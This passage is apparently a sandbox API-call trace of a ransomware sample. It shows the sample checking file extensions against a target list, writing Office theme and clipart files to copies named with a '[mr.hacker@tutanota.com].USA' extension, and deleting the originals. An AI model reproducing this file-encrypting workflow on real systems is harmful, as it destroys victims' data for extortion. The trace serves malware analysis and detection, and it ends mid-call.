[0269.227] CloseHandle (hObject=0x388) returned 1 [0269.227] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SUMER_01.MID.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0269.270] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SUMER_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\sumer_01.mid")) returned 1 [0269.278] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SUMER_01.MID") returned 63 [0269.278] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SUMER_01.MID") returned 63 [0269.278] lstrlenW (lpString=".doc") returned 4 [0269.278] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0269.278] lstrlenW (lpString=".docx") returned 5 [0269.278] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1 [0269.278] lstrlenW (lpString=".pdf") returned 4 [0269.278] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0269.278] lstrlenW (lpString=".xls") returned 4 [0269.278] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0269.278] lstrlenW (lpString=".xlsx") returned 5 [0269.279] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1 [0269.279] lstrlenW (lpString=".ppt") returned 4 [0269.279] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0269.279] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SUMER_01.MID") returned 63 [0269.279] lstrlenW (lpString=".zip") returned 4 [0269.279] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0269.279] lstrlenW (lpString=".rar") returned 4 [0269.279] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0269.279] lstrlenW (lpString=".bz2") returned 4 [0269.279] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0269.279] lstrlenW (lpString=".7z") returned 3 [0269.279] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0269.279] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SUMER_01.MID") returned 63 [0269.279] lstrlenW (lpString=".dbf") returned 4 [0269.279] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0269.279] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SUMER_01.MID") returned 63 [0269.279] lstrlenW (lpString=".1cd") returned 4 [0269.279] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0269.279] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SUMER_01.MID") returned 63 [0269.279] lstrlenW (lpString=".jpg") returned 4 [0269.279] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0269.279] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SUMER_01.MID") returned 63 [0269.279] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SUMER_01.MID") returned 63 [0269.279] lstrlenW (lpString=".doc") returned 4 [0269.279] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0269.279] lstrlenW (lpString=".docx") returned 5 [0269.279] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1 [0269.279] lstrlenW (lpString=".pdf") returned 4 [0269.279] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0269.279] lstrlenW (lpString=".xls") returned 4 [0269.279] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0269.280] lstrlenW (lpString=".xlsx") returned 5 [0269.280] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1 [0269.280] lstrlenW (lpString=".ppt") returned 4 [0269.280] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0269.280] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SUMER_01.MID") returned 63 [0269.280] lstrlenW (lpString=".zip") returned 4 [0269.280] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0269.280] lstrlenW (lpString=".rar") returned 4 [0269.280] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0269.280] lstrlenW (lpString=".bz2") returned 4 [0269.280] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0269.280] lstrlenW (lpString=".7z") returned 3 [0269.280] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0269.280] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SUMER_01.MID") returned 63 [0269.280] lstrlenW (lpString=".dbf") returned 4 [0269.280] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0269.280] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SUMER_01.MID") returned 63 [0269.280] lstrlenW (lpString=".1cd") returned 4 [0269.280] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0269.280] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SUMER_01.MID") returned 63 [0269.280] lstrlenW (lpString=".jpg") returned 4 [0269.280] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0269.280] lstrcmpiW (lpString1=".eftx", lpString2=".USA") returned -1 [0269.280] lstrlenW (lpString="Angles.eftx") returned 11 [0269.280] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Angles.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\angles.eftx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0269.324] GetFileSizeEx (in: hFile=0x384, lpFileSize=0x3a8ff1c | out: lpFileSize=0x3a8ff1c*=27365) returned 1 [0269.324] CloseHandle (hObject=0x384) returned 1 [0269.324] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Angles.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\angles.eftx")) returned 0x20 [0269.324] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Angles.eftx.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\angles.eftx.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0269.324] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Angles.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\angles.eftx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0269.324] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a8fec8 | out: lpNewFilePointer=0x0) returned 1 [0269.324] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a8fec8 | out: lpNewFilePointer=0x0) returned 1 [0269.324] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Angles.eftx.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\angles.eftx.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a0 [0269.327] GetLastError () returned 0x0 [0269.327] ReadFile (in: hFile=0x384, lpBuffer=0x41f0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a8fed4, lpOverlapped=0x0 | out: lpBuffer=0x41f0020*, lpNumberOfBytesRead=0x3a8fed4*=0x6ae5, lpOverlapped=0x0) returned 1 [0269.329] WriteFile (in: hFile=0x3a0, lpBuffer=0x41f0020*, nNumberOfBytesToWrite=0x6af0, lpNumberOfBytesWritten=0x3a8fc9c, lpOverlapped=0x0 | out: lpBuffer=0x41f0020*, lpNumberOfBytesWritten=0x3a8fc9c*=0x6af0, lpOverlapped=0x0) returned 1 [0269.330] ReadFile (in: hFile=0x384, lpBuffer=0x41f0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a8fed4, lpOverlapped=0x0 | out: lpBuffer=0x41f0020*, lpNumberOfBytesRead=0x3a8fed4*=0x0, lpOverlapped=0x0) returned 1 [0269.330] WriteFile (in: hFile=0x3a0, lpBuffer=0x41f0020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x3a8fc9c, lpOverlapped=0x0 | out: lpBuffer=0x41f0020*, lpNumberOfBytesWritten=0x3a8fc9c*=0xea, lpOverlapped=0x0) returned 1 [0269.330] SetEndOfFile (hFile=0x3a0) returned 1 [0269.330] CloseHandle (hObject=0x3a0) returned 1 [0269.330] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a8fec8 | out: lpNewFilePointer=0x0) returned 1 [0269.330] SetEndOfFile (hFile=0x384) returned 1 [0269.334] CloseHandle (hObject=0x384) returned 1 [0269.334] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Angles.eftx.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0269.335] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Angles.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\angles.eftx")) returned 1 [0269.335] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Angles.eftx") returned 78 [0269.335] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Angles.eftx") returned 78 [0269.335] lstrlenW (lpString=".doc") returned 4 [0269.335] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1 [0269.335] lstrlenW (lpString=".docx") returned 5 [0269.335] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1 [0269.335] lstrlenW (lpString=".pdf") returned 4 [0269.335] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1 [0269.335] lstrlenW (lpString=".xls") returned 4 [0269.335] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1 [0269.335] lstrlenW (lpString=".xlsx") returned 5 [0269.335] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1 [0269.335] lstrlenW (lpString=".ppt") returned 4 [0269.335] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1 [0269.335] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Angles.eftx") returned 78 [0269.335] lstrlenW (lpString=".zip") returned 4 [0269.335] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1 [0269.335] lstrlenW (lpString=".rar") returned 4 [0269.335] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1 [0269.335] lstrlenW (lpString=".bz2") returned 4 [0269.336] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1 [0269.336] lstrlenW (lpString=".7z") returned 3 [0269.336] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1 [0269.336] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Angles.eftx") returned 78 [0269.336] lstrlenW (lpString=".dbf") returned 4 [0269.336] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1 [0269.336] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Angles.eftx") returned 78 [0269.336] lstrlenW (lpString=".1cd") returned 4 [0269.336] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1 [0269.336] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Angles.eftx") returned 78 [0269.336] lstrlenW (lpString=".jpg") returned 4 [0269.336] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1 [0269.336] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Angles.eftx") returned 78 [0269.336] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Angles.eftx") returned 78 [0269.336] lstrlenW (lpString=".doc") returned 4 [0269.336] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1 [0269.336] lstrlenW (lpString=".docx") returned 5 [0269.336] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1 [0269.336] lstrlenW (lpString=".pdf") returned 4 [0269.336] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1 [0269.336] lstrlenW (lpString=".xls") returned 4 [0269.336] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1 [0269.336] lstrlenW (lpString=".xlsx") returned 5 [0269.336] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1 [0269.336] lstrlenW (lpString=".ppt") returned 4 [0269.336] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1 [0269.336] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Angles.eftx") returned 78 [0269.337] lstrlenW (lpString=".zip") returned 4 [0269.337] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1 [0269.337] lstrlenW (lpString=".rar") returned 4 [0269.337] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1 [0269.337] lstrlenW (lpString=".bz2") returned 4 [0269.337] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1 [0269.337] lstrlenW (lpString=".7z") returned 3 [0269.337] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1 [0269.337] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Angles.eftx") returned 78 [0269.337] lstrlenW (lpString=".dbf") returned 4 [0269.337] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1 [0269.337] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Angles.eftx") returned 78 [0269.337] lstrlenW (lpString=".1cd") returned 4 [0269.337] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1 [0269.337] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Angles.eftx") returned 78 [0269.337] lstrlenW (lpString=".jpg") returned 4 [0269.337] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1 [0269.337] lstrcmpiW (lpString1=".eftx", lpString2=".USA") returned -1 [0269.337] lstrlenW (lpString="Apex.eftx") returned 9 [0269.337] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Apex.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\apex.eftx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0269.338] GetFileSizeEx (in: hFile=0x384, lpFileSize=0x3a8ff1c | out: lpFileSize=0x3a8ff1c*=218310) returned 1 [0269.338] CloseHandle (hObject=0x384) returned 1 [0269.338] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Apex.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\apex.eftx")) returned 0x20 [0269.338] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Apex.eftx.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\apex.eftx.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0269.338] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Apex.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\apex.eftx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0269.339] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a8fec8 | out: lpNewFilePointer=0x0) returned 1 [0269.339] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a8fec8 | out: lpNewFilePointer=0x0) returned 1 [0269.339] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Apex.eftx.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\apex.eftx.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a0 [0269.339] GetLastError () returned 0x0 [0269.339] ReadFile (in: hFile=0x384, lpBuffer=0x41f0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a8fed4, lpOverlapped=0x0 | out: lpBuffer=0x41f0020*, lpNumberOfBytesRead=0x3a8fed4*=0x354c6, lpOverlapped=0x0) returned 1 [0269.368] WriteFile (in: hFile=0x3a0, lpBuffer=0x41f0020*, nNumberOfBytesToWrite=0x354d0, lpNumberOfBytesWritten=0x3a8fc9c, lpOverlapped=0x0 | out: lpBuffer=0x41f0020*, lpNumberOfBytesWritten=0x3a8fc9c*=0x354d0, lpOverlapped=0x0) returned 1 [0269.381] ReadFile (in: hFile=0x384, lpBuffer=0x41f0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a8fed4, lpOverlapped=0x0 | out: lpBuffer=0x41f0020*, lpNumberOfBytesRead=0x3a8fed4*=0x0, lpOverlapped=0x0) returned 1 [0269.381] WriteFile (in: hFile=0x3a0, lpBuffer=0x41f0020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x3a8fc9c, lpOverlapped=0x0 | out: lpBuffer=0x41f0020*, lpNumberOfBytesWritten=0x3a8fc9c*=0xe6, lpOverlapped=0x0) returned 1 [0269.381] SetEndOfFile (hFile=0x3a0) returned 1 [0269.381] CloseHandle (hObject=0x3a0) returned 1 [0269.381] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a8fec8 | out: lpNewFilePointer=0x0) returned 1 [0269.381] SetEndOfFile (hFile=0x384) returned 1 [0269.387] CloseHandle (hObject=0x384) returned 1 [0269.387] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Apex.eftx.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0269.406] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Apex.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\apex.eftx")) returned 1 [0269.406] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Apex.eftx") returned 76 [0269.406] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Apex.eftx") returned 76 [0269.406] lstrlenW (lpString=".doc") returned 4 [0269.406] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1 [0269.406] lstrlenW (lpString=".docx") returned 5 [0269.406] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1 [0269.406] lstrlenW (lpString=".pdf") returned 4 [0269.406] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1 [0269.406] lstrlenW (lpString=".xls") returned 4 [0269.406] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1 [0269.406] lstrlenW (lpString=".xlsx") returned 5 [0269.406] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1 [0269.406] lstrlenW (lpString=".ppt") returned 4 [0269.406] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1 [0269.407] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Apex.eftx") returned 76 [0269.407] lstrlenW (lpString=".zip") returned 4 [0269.407] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1 [0269.407] lstrlenW (lpString=".rar") returned 4 [0269.407] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1 [0269.407] lstrlenW (lpString=".bz2") returned 4 [0269.407] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1 [0269.407] lstrlenW (lpString=".7z") returned 3 [0269.407] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1 [0269.407] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Apex.eftx") returned 76 [0269.407] lstrlenW (lpString=".dbf") returned 4 [0269.407] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1 [0269.407] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Apex.eftx") returned 76 [0269.407] lstrlenW (lpString=".1cd") returned 4 [0269.407] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1 [0269.407] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Apex.eftx") returned 76 [0269.407] lstrlenW (lpString=".jpg") returned 4 [0269.407] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1 [0269.407] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Apex.eftx") returned 76 [0269.407] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Apex.eftx") returned 76 [0269.407] lstrlenW (lpString=".doc") returned 4 [0269.407] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1 [0269.407] lstrlenW (lpString=".docx") returned 5 [0269.407] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1 [0269.407] lstrlenW (lpString=".pdf") returned 4 [0269.408] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1 [0269.408] lstrlenW (lpString=".xls") returned 4 [0269.408] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1 [0269.408] lstrlenW (lpString=".xlsx") returned 5 [0269.408] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1 [0269.408] lstrlenW (lpString=".ppt") returned 4 [0269.408] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1 [0269.408] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Apex.eftx") returned 76 [0269.408] lstrlenW (lpString=".zip") returned 4 [0269.408] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1 [0269.408] lstrlenW (lpString=".rar") returned 4 [0269.408] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1 [0269.408] lstrlenW (lpString=".bz2") returned 4 [0269.408] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1 [0269.408] lstrlenW (lpString=".7z") returned 3 [0269.408] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1 [0269.408] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Apex.eftx") returned 76 [0269.408] lstrlenW (lpString=".dbf") returned 4 [0269.408] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1 [0269.408] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Apex.eftx") returned 76 [0269.408] lstrlenW (lpString=".1cd") returned 4 [0269.408] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1 [0269.408] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Apex.eftx") returned 76 [0269.408] lstrlenW (lpString=".jpg") returned 4 [0269.408] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1 [0269.409] lstrcmpiW (lpString1=".eftx", lpString2=".USA") returned -1 [0269.409] lstrlenW (lpString="Aspect.eftx") returned 11 [0269.409] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Aspect.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\aspect.eftx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac [0269.455] GetFileSizeEx (in: hFile=0x3ac, lpFileSize=0x3a8ff1c | out: lpFileSize=0x3a8ff1c*=22554) returned 1 [0269.455] CloseHandle (hObject=0x3ac) returned 1 [0269.455] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Aspect.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\aspect.eftx")) returned 0x20 [0269.456] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Aspect.eftx.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\aspect.eftx.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0269.456] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Aspect.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\aspect.eftx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac [0269.456] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a8fec8 | out: lpNewFilePointer=0x0) returned 1 [0269.456] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a8fec8 | out: lpNewFilePointer=0x0) returned 1 [0269.456] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Aspect.eftx.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\aspect.eftx.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0 [0269.456] GetLastError () returned 0x0 [0269.456] ReadFile (in: hFile=0x3ac, lpBuffer=0x41f0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a8fed4, lpOverlapped=0x0 | out: lpBuffer=0x41f0020*, lpNumberOfBytesRead=0x3a8fed4*=0x581a, lpOverlapped=0x0) returned 1 [0269.458] WriteFile (in: hFile=0x3b0, lpBuffer=0x41f0020*, nNumberOfBytesToWrite=0x5820, lpNumberOfBytesWritten=0x3a8fc9c, lpOverlapped=0x0 | out: lpBuffer=0x41f0020*, lpNumberOfBytesWritten=0x3a8fc9c*=0x5820, lpOverlapped=0x0) returned 1 [0269.459] ReadFile (in: hFile=0x3ac, lpBuffer=0x41f0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a8fed4, lpOverlapped=0x0 | out: lpBuffer=0x41f0020*, lpNumberOfBytesRead=0x3a8fed4*=0x0, lpOverlapped=0x0) returned 1 [0269.459] WriteFile (in: hFile=0x3b0, lpBuffer=0x41f0020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x3a8fc9c, lpOverlapped=0x0 | out: lpBuffer=0x41f0020*, lpNumberOfBytesWritten=0x3a8fc9c*=0xea, lpOverlapped=0x0) returned 1 [0269.459] SetEndOfFile (hFile=0x3b0) returned 1 [0269.459] CloseHandle (hObject=0x3b0) returned 1 [0269.459] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a8fec8 | out: lpNewFilePointer=0x0) returned 1 [0269.459] SetEndOfFile (hFile=0x3ac) returned 1 [0269.461] CloseHandle (hObject=0x3ac) returned 1 [0269.461] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Aspect.eftx.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0269.462] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Aspect.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\aspect.eftx")) returned 1 [0269.464] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Aspect.eftx") returned 78 [0269.464] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Aspect.eftx") returned 78 [0269.464] lstrlenW (lpString=".doc") returned 4 [0269.464] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned 